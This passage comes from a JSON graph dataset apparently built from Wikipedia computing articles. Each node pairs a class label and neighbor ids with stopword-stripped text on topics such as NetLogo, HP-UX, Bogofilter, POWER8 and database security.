    "mask": "Train"
  },
  {
    "node_id": 1300,
    "label": 7,
    "text": "Mac_CRM:mac crm mac customer relationship management mac crm approach managing company ’ interaction current future customers apple inc desktop computers ios devices mac crm solutions web-based applications use web browser interaction instead mac crm combination cloud based app built apple programming language objective-c swift programming language mac crms involve using apple devices technology organize automate synchronize sales marketing customer service technical support mac crm first used ntractive llc 2007 preparation launch elements sbm 8 term mac crm first publicly used launching elements sbm 1.0 ntractive elements sbm press released named ntractive announces mac crm elements sbm 1.0 ntractive later renamed elements sbm element crm july 2009 ntractive privately held software development company based grand forks north dakota markets business software small medium-sized companies established 2006 company sole product elements crm customer relationship management application aimed small businesses use mac os x computers ipads iphones elements crm cloud based app employs unique site-specific browser merge os x desktop web application functionality product first introduced public keynote address apple 2007 world wide developer conference official launch elements sbm product ’ original name 1.0 took place macworld/iworld 2009 product renamed elements crm 2.0 release awarded honor apple staff pick july 2009 elements crm mac customer relationship management mac crm solution apple business using apple devices offered subscription-based service elements crm part desktop part cloud main functions include managing leads contact information tracking communication history managing tasks follow-ups tracking email communication creating estimates invoices managing projects elements crm ios universal mobile app iphone ipad elements crm ios add-on elements crm desktop app ipad crm version elements crm ios looks works feels like desktop app iphone crm app limited version important functions desktop app",
    "neighbors": [
      9732,
      2950,
      10470,
      6539,
      6046,
      7292,
      4190
    ],
    "mask": "None"
  },
  {
    "node_id": 1301,
    "label": 9,
    "text": "NetLogo:netlogo netlogo programming language integrated development environment ide modeling agent-based netlogo designed uri wilensky spirit programming language logo low threshold ceiling teaches programming concepts using agents form turtles patches links observer netlogo designed multiple audiences mind particular teaching children education community domain experts without programming background model related phenomena many scientific articles published using netlogo netlogo environment enables exploration emergent phenomena comes extensive models library including models variety domains economics biology physics chemistry psychology system dynamics netlogo allows exploration modifying switches sliders choosers inputs interface elements beyond exploring netlogo allows authoring new models modifying extant models netlogo open source freely available netlogo website use wide variety educational contexts elementary school graduate school many teachers make use netlogo curricula netlogo designed authored uri wilensky director northwestern university center connected learning computer-based modeling ccl several books published netlogo books available print include books available online include several massive open online courses offered use netlogo assignments and/or demonstrations netlogo free open-source software released gnu general public license gpl commercial licenses also available written scala java runs java virtual machine jvm core hybrid interpreter/compiler partially compiles user code jvm bytecode netlogo web version runs javascript instead jvm models may run web browser features desktop version simple multiagent model netlogo wolf-sheep predation model shown screenshot models population growth predator/prey system time following characteristics hubnet technology uses netlogo run participatory simulations classroom participatory simulation whole group users takes part enacting behavior system using individual device networked computer texas instruments graphing calculator user acts separate independent agent one example hubnet activity tragedy commons models economic problem called tragedy commons",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      75,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      3705,
      7805,
      9345,
      1159,
      9865,
      5775,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      219,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      5872,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      5612,
      7670,
      11255
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1302,
    "label": 8,
    "text": "PDFescape:pdfescape pdfescape advertising- fee-supported web-based pdf editor program written javascript html css asp features pdf editing form filling page arrangement printing saving form publishing premium ad free version available fee form publishing requires additional fees pdfescape offers online storage pdf documents pdfescape used common browsers firefox internet explorer safari chrome opera first release published february 20 2007 pdfescape reviewed websites cnet lifehacker pdf documents opened within application imported web interface open documents modified using set tools similar limited found pdf applications adobe acrobat following features available",
    "neighbors": [
      9347,
      3462,
      8584,
      5612,
      7983,
      8627,
      5078,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 1303,
    "label": 5,
    "text": "Multi-link_trunking:multi-link trunking multi-link trunking mlt link aggregation port trunking technology developed nortel 1999 allows grouping several physical ethernet links one logical ethernet link provide fault-tolerance high-speed links routers switches servers using technology allows enables use several links 2 8 combined create increased bandwidth several fail-over paths produces server switch switch switch connections 8 times faster past redundant links unused due spanning tree ’ loop protection fault-tolerant design important aspect multi-link trunking technology one one link fail mlt technology automatically redistribute traffic across remaining links automatic redistribution accomplished less half second typically less 100 millisecond outage noticed end users high speed recovery required many critical networks outages cause loss life large monetary losses critical networks combining mlt technology distributed split multi-link trunking dsmlt split multi-link trunking smlt r-smlt technologies create networks support critical applications general limitation standard mlt physical ports link aggregation group must reside switch smlt dsmlt r-smlt technologies removes limitation allowing physical ports split two switches split multi-link trunking smlt layer-2 link aggregation technology computer networking originally developed nortel enhancement standard multi-link trunking mlt defined ieee 802.3ad link aggregation mlt allows multiple physical network links two network switches another device could another switch network device server treated single logical link load balance traffic across available links packet needs transmitted one physical links selected based load-balancing algorithm usually involving hash function operating source destination media access control mac address information real-world network traffic generally results effective bandwidth logical link equal sum bandwidth individual physical links redundant links unused due spanning tree ’ loop protection used full potential general limitation standard link aggregation mlt etherchannel physical ports link aggregation group must reside switch smlt dsmlt rsmlt protocols remove limitation allowing physical ports split two switches allowing creation active load sharing high availability network designs meet five nines availability requirements two switches smlt split known aggregation switches form logical cluster appears end smlt link single switch split may one ends mlt ends link split resulting topology referred smlt square cross-connect diagonally opposite aggregation switches smlt mesh aggregation switch smlt connection aggregation switches pair one end split topology referred smlt triangle smlt triangle end link split need support smlt allows non-avaya devices including third-party switches servers benefit smlt requirement ieee 802.3ad static mode must supported key operation smlt inter-switch trunk ist ist standard mlt connection aggregation switches allows exchange information regarding traffic forwarding status individual smlt links smlt connection aggregation switches standard mlt individual port smlt identifier associated given smlt connection smlt id must configured peer aggregation switches example one switch receives response arp request end station port part smlt inform peer switch across ist request peer update arp table record pointing connection corresponding smlt id general normal network traffic traverse ist unless path reach host connected peer switch ensuring devices smlt connections aggregation switches traffic never needs traverse ist total forwarding capacity switches cluster also aggregated communication peer switches across ist allows unicast multicast routing information exchanged allowing protocols open shortest path first ospf protocol independent multicast-sparse mode pim-sm operate correctly use smlt allows traffic load-balanced across links aggregation group also allows traffic redistributed quickly event link switch failure general failure one component results traffic disruption lasting less half second normal less 100 millisecond making smlt appropriate environments running time- loss-sensitive applications voice video network using smlt often longer necessary run spanning tree protocol kind since logical bridging loops introduced presence ist eliminates need spanning tree reconvergence root-bridge failovers failure scenarios causes interruptions network traffic longer time-sensitive applications able cater smlt supported within following avaya ethernet routing switch ers virtual services platform vsp product families ers 1600 ers 5500 ers 5600 ers 7000 ers 8300 ers 8800 ers 8600 mers 8600 vsp 9000 smlt fully interoperable devices supporting standard mlt ieee 802.3ad static mode routed-smlt r-smlt computer networking protocol developed nortel enhancement split multi-link trunking smlt enabling exchange layer 3 information peer nodes switch cluster resiliency simplicity l3 l2 many cases core network convergence time failure dependent length time routing protocol requires successfully converge change re-route traffic around fault depending specific routing protocol convergence time cause network interruptions ranging seconds minutes r-smlt protocol works smlt distributed split multi-link trunking dsmlt technologies provide sub-second failover normally less 100 milliseconds outage noticed end users high speed recovery required many critical networks outages cause loss life large monetary losses critical networks rsmlt routing topologies providing active-active router concept core smlt networks protocol supports networks designed smlt dsmlt triangles squares smlt dsmlt full mesh topologies routing enabled core vlans r-smlt takes care packet forwarding core router failures works following protocol types ip unicast static routes rip1 rip2 ospf bgp ipx rip r-smlt supported avaya ethernet routing switch ers 8600 ers 8800 vsp9000 ers 8300 mers 8600 products distributed multi-link trunking dmlt distributed mlt proprietary computer networking protocol designed nortel networks owned extreme networks used load balance network traffic across connections also across multiple switches modules chassis protocol enhancement multi-link trunking mlt protocol dmlt allows ports trunk mlt span multiple units stack switches span multiple cards chassis preventing network outages one switch stack fails card chassis fails united states patent 6496502 distributed split multi-link trunking dsmlt distributed smlt computer networking technology developed nortel enhance split multi-link trunking smlt protocol dsmlt allows ports trunk span multiple units stack switches span multiple cards chassis preventing network outages one switch stack fails one card chassis fails fault-tolerance important aspect distributed split multi-link trunking dsmlt technology one switch port one link fail dsmlt technology automatically redistribute traffic across remaining links automatic redistribution accomplished less half second typically less 100 milliseconds outage noticed end users high speed recovery required many critical networks outages cause loss life large monetary losses critical networks combining multi-link trunking mlt dmlt smlt dsmlt r-smlt technologies create networks support critical networks smlt supported avaya ethernet routing switch 1600 5500 8300 ers 8600 mers 8600 vsp-7000 vsp-9000 products",
    "neighbors": [
      9603,
      1284,
      3751,
      7049,
      9937,
      5490,
      11286,
      1303,
      3580,
      5437,
      10175
    ],
    "mask": "Test"
  },
  {
    "node_id": 1304,
    "label": 2,
    "text": "HP-UX:hp-ux hp-ux hewlett packard unix hewlett packard enterprise proprietary implementation unix operating system based unix system v initially system iii first released 1984 recent versions support hp 9000 series computer systems based pa-risc instruction set architecture hp integrity systems based intel itanium architecture earlier versions hp-ux supported hp integral pc hp 9000 series 200 300 400 computer systems based motorola 68000 series processors well hp 9000 series 500 computers based hp proprietary focus architecture hp-ux first unix offer access control lists file access permissions alternative standard unix permissions system hp-ux also among first unix systems include built-in logical volume manager hp long partnership veritas software uses vxfs primary file system one six commercial operating systems versions certified open group unix 03 standard others macos solaris inspur k-ux huawei euleros aix hp-ux 11i offers common shared disks clustered file system hp serviceguard cluster solution hp-ux hp global workload management adjusts workloads optimize performance integrates instant capacity demand installed resources paid 30-minute increments needed peak workload demands hp-ux offers operating system-level virtualization features hardware partitions isolated os virtual partitions cell-based servers hp integrity virtual machines hpvm integrity servers hpvm supports guests running hp-ux 11i v3 hosts – guests run linux windows openvms 8.4 hp-ux hp supports online vm guest migration encryption secure guest contents migration hp-ux 11i v3 scales follows superdome 2 32 intel itanium 9560 processors 11i v2 release introduced kernel-based intrusion detection strong random number generation stack buffer overflow protection security partitioning role-based access management various open-source security tools hp classifies operating system security features three categories data system identity release 6.x together 3.x introduced context dependent files cdf feature method allowing fileserver serve different configurations binaries even architectures different client machines heterogeneous environment directory containing files suid bit set made hidden ordinary root processes normal use scheme sometimes exploited intruders hide malicious programs data cdfs cdf filesystem dropped release 10.0 hp-ux operating systems supports variety pa-risc systems 11.0 added support integrity-based servers transition pa-risc itanium hp-ux 11i v1.5 first version supported itanium introduction hp-ux 11i v2 operating system supported architectures hp-ux 11i supports hp integrity servers hp bl server blade family servers use intel itanium architecture hp-ux 11i v2 11i v3 support hp cx series servers cx stands carrier grade used mainly telco industry -48v dc support nebs certified systems contain itanium mad6m processors discontinued hp-ux supports hp rx series servers prior release hp-ux version 11.11 hp used decimal version numbering scheme first number giving major release number following decimal showing minor release 11.11 hp made marketing decision name releases 11 followed v decimal-number version intended indicate os internet-enabled effective result dual version-numbering scheme hp bundles hp-ux 11i programs packages call operating environments oes following lists currently available hp-ux 11i v3 oes",
    "neighbors": [
      2560,
      10752,
      7682,
      6661,
      15,
      1555,
      6675,
      8212,
      8725,
      1560,
      1561,
      3615,
      9762,
      7204,
      8229,
      9764,
      1064,
      44,
      5677,
      10797,
      7224,
      9784,
      9280,
      8262,
      2120,
      6218,
      3659,
      7243,
      11344,
      2132,
      1109,
      5209,
      11353,
      5723,
      2143,
      2656,
      1634,
      10851,
      10340,
      3173,
      1638,
      7269,
      6760,
      11363,
      9836,
      6765,
      8816,
      8306,
      8312,
      633,
      7802,
      7291,
      5756,
      125,
      5245,
      640,
      2179,
      132,
      6787,
      142,
      3214,
      9360,
      7313,
      2710,
      3742,
      671,
      3744,
      1185,
      8350,
      3237,
      7848,
      3241,
      10924,
      9389,
      3248,
      7863,
      1212,
      1724,
      7356,
      6852,
      10436,
      9930,
      206,
      3281,
      2258,
      10962,
      10965,
      9948,
      1757,
      6369,
      2786,
      9444,
      11501,
      5358,
      7919,
      1776,
      8944,
      242,
      5363,
      2292,
      11505,
      2301,
      5381,
      7941,
      11013,
      5384,
      8969,
      6412,
      3343,
      8975,
      10511,
      2322,
      787,
      1813,
      5397,
      8469,
      1305,
      283,
      8991,
      3872,
      2338,
      8482,
      7460,
      8994,
      1837,
      6445,
      7983,
      10033,
      10237,
      6451,
      2870,
      823,
      825,
      7483,
      9027,
      9540,
      3400,
      2378,
      10058,
      8012,
      8524,
      4433,
      1874,
      6483,
      8020,
      3414,
      2903,
      4438,
      11608,
      2395,
      8539,
      11100,
      5470,
      7022,
      9585,
      5492,
      2424,
      4989,
      3966,
      2432,
      5506,
      8582,
      11145,
      10122,
      7566,
      9106,
      5523,
      7067,
      414,
      3487,
      3488,
      6049,
      7588,
      9125,
      5546,
      5036,
      10156,
      9647,
      11184,
      1971,
      2995,
      9141,
      11188,
      3006,
      9151,
      10176,
      5569,
      9665,
      5571,
      9671,
      8136,
      5067,
      6092,
      974,
      4562,
      6098,
      11218,
      470,
      5078,
      7134,
      6624,
      6626,
      4067,
      1508,
      1509,
      7139,
      11237,
      8682,
      9706,
      4076,
      3565,
      11246,
      2035,
      10236,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1305,
    "label": 4,
    "text": "Bogofilter:bogofilter bogofilter mail filter classifies e-mail spam ham non-spam statistical analysis message header content body program able learn user classifications corrections originally written eric s. raymond read paul graham article plan spam maintained together group contributors david relson matthias andree greg louis statistical technique used known bayesian filtering bogofilter primary algorithm uses f w parameter fisher inverse chi-square technique describes bogofilter may run mda mail client classify messages delivered recipient mailboxes used mta classify messages received sending smtp server bogofilter examines tokens message body header refers wordlists stored berkeleydb sqlite qdbm calculate probability score new message spam bogofilter provides processing plain text html supports reading multi-part mime message including base64 quoted-printable uuencoded text html bogofilter ignores non-text attachments images possible tune bogofilter statistical algorithms modifying various coefficients settings configuration file using automated bogotune utility included software attempts optimise various coefficients maximise filtering efficiency particular corpus spam non-spam standard tests trec 2005 show bogofilter compares well competitors spambayes crm114 dspam competitors include limited spamprobe qsf bogofilter written c runs linux freebsd netbsd openbsd solaris mac os x hp-ux aix platforms released gnu gpl article earlier revision edited bogofilter homepage",
    "neighbors": [
      9824,
      5249,
      9222,
      3336,
      5546,
      1771,
      6762,
      8747,
      4272,
      823,
      1304,
      1594,
      2045,
      10906,
      5407
    ],
    "mask": "None"
  },
  {
    "node_id": 1306,
    "label": 7,
    "text": "JanusGraph:janusgraph janusgraph open source distributed graph database linux foundation janusgraph available apache license 2.0 project supported ibm google hortonworks janusgraph supports various storage backends apache cassandra apache hbase google cloud bigtable oracle berkeleydb scalability janusgraph depends underlying technologies used janusgraph example using apache cassandra storage backend scaling multiple datacenters provided box janusgraph supports global graph data analytics reporting etl integration big data platforms apache spark apache giraph apache hadoop janusgraph supports geo numeric range full-text search via external index storages elasticsearch apache solr apache lucene janusgraph native integration apache tinkerpop graph stack gremlin graph query language gremlin graph server gremlin applications janusgraph fork titandb graph database developed since 2012 janusgraph available apache software license 2.0 contributions individual organisation must sign cla paper",
    "neighbors": [
      7816,
      8810,
      4011,
      6458,
      5677,
      1296,
      6161,
      5047,
      8408,
      1594,
      9631
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1307,
    "label": 1,
    "text": "Zope_Object_Database:zope object database zope object database zodb object-oriented database transparently persistently storing python objects included part zope web application server also used independently zope features zodb include transactions history/undo transparently pluggable storage built-in caching multiversion concurrency control mvcc scalability across network using zodb stores python objects using extended version python built-in object persistence pickle zodb database single root object normally dictionary object directly made accessible database objects stored database reached root object objects referenced object stored database automatically stored database well zodb supports concurrent transactions using mvcc tracks changes objects per-object basis changed objects committed transactions non-destructive default reverted example say car described using 3 classes codice_1 codice_2 codice_3 python could represented following way variable mycar root persistence puts object instances car wheel screws etc storage retrieved later another program gets connection database mycar object performing retrieves objects pointer car held codice_4 variable later stage object altered python code like storage altered reflect change data commit ordered declaration data structure either python zodb new fields freely added existing object persistence take place python car class must derived persistence persistent class — class holds data necessary persistence machinery work internal object id state object also defines boundary persistence following sense every object whose class derives persistent atomic unit storage whole object copied storage field modified example codice_1 class deriving persistent codice_6 added car objects must written storage contrast codice_7 also derives persistent codice_8 performed new record written storage hold new value codice_1 existing codice_7 kept new record codice_1 points already existing codice_7 record inside storage zodb machinery n't chase modification graph pointers example codice_13 modification automatically tracked zodb machinery codice_14 persistent class codice_1 zodb machinery marking record dirty however list change inside list n't noticed zodb machinery programmer must help manually adding codice_16 notifying zodb record actually changed thus certain extent programmer must aware working persistence machinery storage unit object whose class derives persistent also atomicity unit example codice_17 persistent class thread modifies wheel codice_1 record must notified another thread modifies another codice_7 inside another transaction second commit fail codice_7 also persistent codice_21 modified independently two different threads two different transactions class persistence—writing class particular object storage—is obtained writing kind fully qualified name class record disk python name class involves hierarchy directory source file class resides consequence source file persisting object moved zodb machinery unable locate class object retrieving storage resulting broken object zope enterprise objects zeo zodb storage implementation allows multiple client processes persist objects single zeo server allows transparent scaling",
    "neighbors": [
      8201,
      8554,
      5612,
      3450,
      7983,
      595,
      7412,
      4919,
      1594
    ],
    "mask": "None"
  },
  {
    "node_id": 1308,
    "label": 9,
    "text": "Skeleton_(computer_programming):skeleton computer programming skeleton programming style computer programming based simple high-level program structures called pseudo code program skeletons resemble pseudocode allow parsing compilation testing code dummy code inserted program skeleton simulate processing avoid compilation error messages may involve empty function declarations functions return correct result simple test case expected response code known skeleton programming facilitates top-down design approach partially functional system complete high-level structures designed coded system progressively expanded fulfill requirements project program skeletons also sometimes used high-level descriptions algorithms program skeleton may also utilized template reflects syntax structures commonly used wide class problems skeleton programs utilized template method design pattern used object-oriented programming object-oriented programming dummy code corresponds abstract method method stub mock object java remote method invocation java rmi nomenclature stub communicates client-side skeleton server-side class skeleton outline class used software engineering contains description class roles describes purposes variables methods implement class later implemented skeleton",
    "neighbors": [
      1952,
      2556,
      8262,
      5399
    ],
    "mask": "None"
  },
  {
    "node_id": 1309,
    "label": 3,
    "text": "POWER8:power8 power8 family superscalar symmetric multiprocessors based power isa announced august 2013 hot chips conference designs available licensing openpower foundation first time availability ibm highest-end processors systems based power8 became available ibm june 2014 systems power8 processor designs made openpower members available early 2015 power8 designed massively multithreaded chip cores capable handling eight hardware threads simultaneously total 96 threads executed simultaneously 12-core chip processor makes use large amounts on- off-chip edram caches on-chip memory controllers enable high bandwidth memory system i/o workloads chip said perform two three times fast predecessor power7 power8 chips comes 6- 12-core variants version fabricated 22 nm silicon insulator soi process using 15 metal layers 12-core version consists 4.2 billion transistors 650 mm large 6-core version 362 mm large however 6- 12-core variants cores active power8 processors come 4 6 8 10 12 cores activated previous power processors use gx++ bus external communication power8 removes design replaces capi port coherent accelerator processor interface layered top pci express 3.0 capi port used connect auxiliary specialized processors gpus asics fpgas units attached capi bus use memory address space cpu thereby reducing computing path length 2013 acm/ieee supercomputing conference ibm nvidia announced engineering partnership closely couple power8 nvidia gpus future hpc systems first announced power systems s824l october 14 2016 ibm announced formation opencapi new organization spread adoption capi platforms initial members google amd xilinx micron mellanox power8 also contains so-called on-chip controller occ power thermal management microcontroller based powerpc 405 processor two general-purpose offload engines gpes 512 kb embedded static ram sram together possibility access main memory directly running open-source firmware occ manages power8 operating frequency voltage memory bandwidth thermal control processor memory regulate voltages 1,764 integrated voltage regulators ivrs fly also occ programmed overclock power8 processor lower power consumption reducing operating frequency similar configurable tdp found intel amd processors power8 splits memory controller functions moving away processor closer memory scheduling logic memory energy management ras decision point moved called memory buffer chip a.k.a centaur offloading certain memory processes memory buffer chip enables memory access optimizations saving bandwidth allowing faster processor memory communication also contains caching structures additional 16 mb l4 cache per chip 128 mb per processor depending system architecture memory buffer chips placed either memory modules custom dimm/cdimm example s824 e880 models memory riser card holding standard dimms example s822lc models memory buffer chip connected processor using high-speed multi-lane serial link memory channel connecting buffer chip capable writing 2 bytes reading 1 byte time runs 8 gb/s early entry models later increased high-end hpc models 9.6 gb/s 40-ns latency sustained bandwidth 24 gb/s 28.8 gb/s per channel respectively processor two memory controllers four memory channels maximum processor memory buffer bandwidth 230.4 gb/s per processor depending model one controller might enabled two channels per controller could use increased availability link provides on-the-fly lane isolation repair memory buffer chip four interfaces allowing use either ddr3 ddr4 memory 1600 mhz change processor link interface resulting 32 memory channels per processor allow peak access rate 409.6 gb/s memory buffer chips dram banks initially support limited 16 gb 32 gb 64 gb dimms allowing 1 tb addressed processor later support 128 gb 256 gb dimms announced allowing 4 tb per processor power8 core 64 kb l1 data cache contained load-store unit 32 kb l1 instruction cache contained instruction fetch unit along tightly integrated 512 kb l2 cache single cycle core fetch eight instructions decode dispatch eight instructions issue execute ten instructions commit eight instructions power8 core consist primarily following six execution units core sixteen execution pipelines larger issue queue 4×16 entries improved branch predictors handle twice many cache misses core eight-way hardware multithreaded dynamically automatically partitioned either one two four eight threads active power8 also added support hardware transactional memory ibm estimates core 1.6 times fast power7 single-threaded operations power8 processor 6- 12-chiplet design variants either 4 6 8 10 12 activated chiplets one chiplet consists one processing core 512 kb sram l2 cache 64-byte wide bus twice wide predecessor 8 mb l3 edram cache per chiplet shareable among chiplets thus six-chiplet processor would 48 mb l3 edram cache 12-chiplet processor would total 96 mb l3 edram cache chip also utilize 128 mb off-chip edram l4 cache using centaur companion chips on-chip memory controllers handle 1 tb ram 230 gb/s sustained memory bandwidth on-board pci express controllers handle 48 gb/s i/o parts system cores designed operate clock rates 2.5 5 ghz six-core chips mounted pairs dual-chip modules dcm ibm scale servers configurations cores active resulting variety configurations actual core count differs 12-core version used high-end e880 e880c models ibm single-chip power8 module called turismo dual-chip variant called murano powercore modified version called cp1 revised version original 12-core power8 ibm used called power8+ main new feature support nvidia bus technology nvlink connecting four nvlink devices directly chip ibm removed bus pci interfaces smp connections power8 sockets replaced nvlink interfaces connection second cpu socket provided via x bus besides slight size increase 659 mm differences seem minimal compared previous power8 processors 19 january 2014 suzhou powercore technology company announced join openpower foundation license power8 core design custom-made processors use big data cloud computing applications",
    "neighbors": [
      3457,
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      3472,
      4881,
      5393,
      7065,
      1563,
      6815,
      10658,
      3493,
      6181,
      6311,
      6949,
      1321,
      8102,
      8233,
      7086,
      815,
      9391,
      4017,
      5297,
      7218,
      10543,
      1461,
      10675,
      823,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      1480,
      336,
      466,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      8058,
      10337,
      4194,
      1635,
      8931,
      869,
      2277,
      3175,
      3431,
      10214,
      10985,
      3819,
      4334,
      10734,
      1776,
      3185,
      4211,
      5235,
      1784,
      7802,
      3323,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 1310,
    "label": 6,
    "text": "Comparison_of_encrypted_external_drives:comparison encrypted external drives technical feature comparison commercial encrypted external drives",
    "neighbors": [
      3572,
      3382,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1311,
    "label": 3,
    "text": "Perry_Mason:_The_Case_of_the_Mandarin_Murder:perry mason case mandarin murder perry mason case mandarin murder interactive fiction computer game graphics game published telarium formerly known trillium subsidiary spinnaker software 1985 game based popular tv series perry mason starring raymond burr played fictional defense attorney name created erle stanley gardner player must save client laura knapp convicted murder husband victor antic amiga 1985 called perry mason major breakthrough interactive fiction",
    "neighbors": [
      9166,
      9006,
      6407
    ],
    "mask": "Test"
  },
  {
    "node_id": 1312,
    "label": 4,
    "text": "Howard_Schmidt:howard schmidt howard anthony schmidt october 5 1949 – march 2 2017 partner tom ridge ridge schmidt cyber llc consultancy company field cybersecurity cyber-security coordinator obama administration operating executive office president united states announced retirement position may 17 2012 effective end month one schmidt leading policy objectives development national strategy trusted identities cyberspace sought enable private industry create electronic identities relied upon cyberspace similar way businesses rely combination driver licenses credit cards authenticate identities physical space prior joining obama administration schmidt served president information security forum president ceo r h security consulting llc founded may 2005 also international president information systems security association chairman board finnish security company codenomicon american security company fortify software international information systems security certification consortium commonly known isc ² october 2008 named one 50 influential people business readers editors baseline magazine schmidt died brain cancer march 2 2017 home muskego wisconsin schmidt held bachelor science degree business administration 1994 master arts degree organizational management 1998 university phoenix also holds honorary doctorate degree humane letters schmidt certifications include cissp cism professor practice georgia institute technology gtisc professor research idaho state university adjunct distinguished fellow carnegie mellon cylab distinguished fellow ponemon institute schmidt began government service united states air force 1967 studied chemical weapons high explosives nuclear weapons attending munitions school 1968 1974 schmidt completed three tours duty southeast asia vietnam war left active military duty 1974 started civil service career gila bend air force auxiliary field since renamed barry m. goldwater air force range served chief transportation deputy director resource management 1982 served arizona air national guard 161st communications squadron based phoenix international airport 1989 1998 schmidt city police officer 1983 1994 chandler police department arizona served swat team organized crime drug enforcement unit formed led special enforcement team 1994 took position fbi national drug intelligence center headed computer exploitation team working fbi 1994 schmidt joined air force office special investigations afosi computer forensic lab computer crime information warfare division supervisory special agent director 1996 serving position established first dedicated computer forensic lab government basis formation defense computer forensic laboratory dcfl 1998 schmidt transferred u.s. army reserves special agent criminal investigation division assigned computer crime investigations unit cciu also served 315th mp det cid ft. lawton washington testified expert witness federal military courts areas computer crime computer forensics internet crime may 2003 schmidt retired white house 31 years public service local federal government 9/11 attacks appointed president bush vice chair president critical infrastructure protection board special adviser cyberspace security white house december 2001 white house assisted creation us national strategy secure cyberspace assumed role chair january 2003 retirement may 2003 joined ebay tuesday december 22 2009 schmidt named united states top computer security advisor president barack obama previously schmidt served cyber-adviser president george w. bush white house served chief security strategist us cert partners program national cyber security division carnegie mellon university support department homeland security served vice president chief information security officer chief security strategist ebay may 2012 schmidt announced would stepping white house cybersecurity coordinator end month citing desire focus family pursue teaching cyber field replaced michael daniel chief white house budget office intelligence branch schmidt also active career private industry professional organizations 1997 schmidt joined microsoft director information security chief information security officer ciso chief security officer cso co-founder trustworthy computing security strategies group schmidt served executive committee information technology sector coordination council memberships include high technology crime investigation association american academy forensic sciences international association chiefs police testified congressional committees computer security cyber crime featured various worldwide television radio shows including bbc abc cnn cnbc fox tv talking cyber-security investigations technology co-author black book corporate security author patrolling cyberspace lessons learned lifetime data security schmidt first president information technology information sharing analysis center former executive board member international organization computer evidence served co-chairman federal computer investigations committee served board member cybercrime advisory board national white collar crime center distinguished special lecturer university new conn. teaching graduate certificate course forensic computing also taught courses fbi dea use computers law enforcement investigations served augmented member president committee advisors science technology formation institute information infrastructure protection schmidt appointed information security privacy advisory board advise national institute standards technology secretary commerce director office management budget information security privacy issues pertaining federal government information systems schmidt also international multilateral partnership cyber threats impact international advisory board see list computing information-security related articles",
    "neighbors": [
      7107,
      10307,
      8613,
      8807,
      2664,
      9319,
      7692,
      399,
      11505,
      3026,
      9688,
      10717
    ],
    "mask": "Test"
  },
  {
    "node_id": 1313,
    "label": 9,
    "text": "Hume_(programming_language):hume programming language hume functionally based programming language developed university st andrews heriot-watt university scotland since year 2000 language name acronym meaning 'higher-order unified meta-environment honorific 18th century philosopher david hume targets real-time embedded systems aiming produce design highly abstract yet still allow precise extraction time space execution costs allows programmers guarantee bounded time space demands executing programs hume combines functional programming ideas ideas finite state automata automata used structure communicating programs series boxes box maps inputs outputs purely functional way using high-level pattern-matching structured series levels exposes different machine properties hume language design attempts maintain essential properties features required embedded systems domain especially transparent time space costing whilst incorporating high level program abstraction possible aims target applications ranging simple micro-controllers complex real-time systems smartphones ambitious goal requires incorporating low-level notions interrupt handling high-level ones data structure abstraction etc course systems programmed widely differing ways language design accommodate varying requirements hume three-layer language outer static declaration/metaprogramming layer intermediate coordination layer describing static layout dynamic processes associated devices inner layer describing process dynamic mapping patterns expressions inner layer stateless purely functional rather attempting apply cost modeling correctness proving technology existing language framework either directly altering general language e.g rtsj approach taken hume designers design hume way formal models proofs definitely constructed hume structured series overlapping language levels level adds expressibility expression semantics either loses desirable property increases technical difficulty providing formal correctness/cost models interpreter compiler versions differ bit coordination system wires boxes dataflow programming style expression language haskell-like message passing concurrency system remembers jocaml join patterns polyphonic c sharp chords channels asynchronous scheduler built-in continuously checks pattern-matching boxes turn putting hold boxes copy outputs busy input destinations",
    "neighbors": [
      9224,
      1083,
      3876
    ],
    "mask": "Test"
  },
  {
    "node_id": 1314,
    "label": 1,
    "text": "Database_security:database security database security concerns use broad range information security controls protect databases potentially including data database applications stored functions database systems database servers associated network links compromises confidentiality integrity availability involves various types categories controls technical procedural/administrative physical database security specialist topic within broader realms computer security information security risk management security risks database systems include example ross j. anderson often said nature large databases never free abuse breaches security large system designed ease access becomes insecure made watertight becomes impossible use sometimes known anderson rule many layers types information security control appropriate databases including databases largely secured hackers network security measures firewalls network-based intrusion detection systems network security controls remain valuable regard securing database systems programs/functions data within arguably become critical networks increasingly opened wider access particular access internet furthermore system program function data access controls along associated user identification authentication rights management functions always important limit cases log activities authorized users administrators words complementary approaches database security working outside-in inside-out many organizations develop baseline security standards designs detailing basic security control measures database systems may reflect general information security requirements obligations imposed corporate information security policies applicable laws regulations e.g concerning privacy financial management reporting systems along generally accepted good database security practices appropriate hardening underlying systems perhaps security recommendations relevant database system software vendors security designs specific database systems typically specify security administration management functions administration reporting user access rights log management analysis database replication/synchronization backups along various business-driven information security controls within database programs functions e.g data entry validation audit trails furthermore various security-related activities manual controls normally incorporated procedures guidelines etc relating design development configuration use management maintenance databases two types privileges important relating database security within database environment system privileges object privileges system privileges allow user perform administrative actions database object privileges allow use certain operations database objects authorized another user examples include usage select insert update references principal least privilege separation duties databases fall internal controls data used public reporting annual reports etc subject separation duties meaning must segregation tasks development production task validated via code walk-through/fresh eyes third person writing actual code database developer able execute anything production without independent review documentation/code work performed typically role developer pass code dba however given 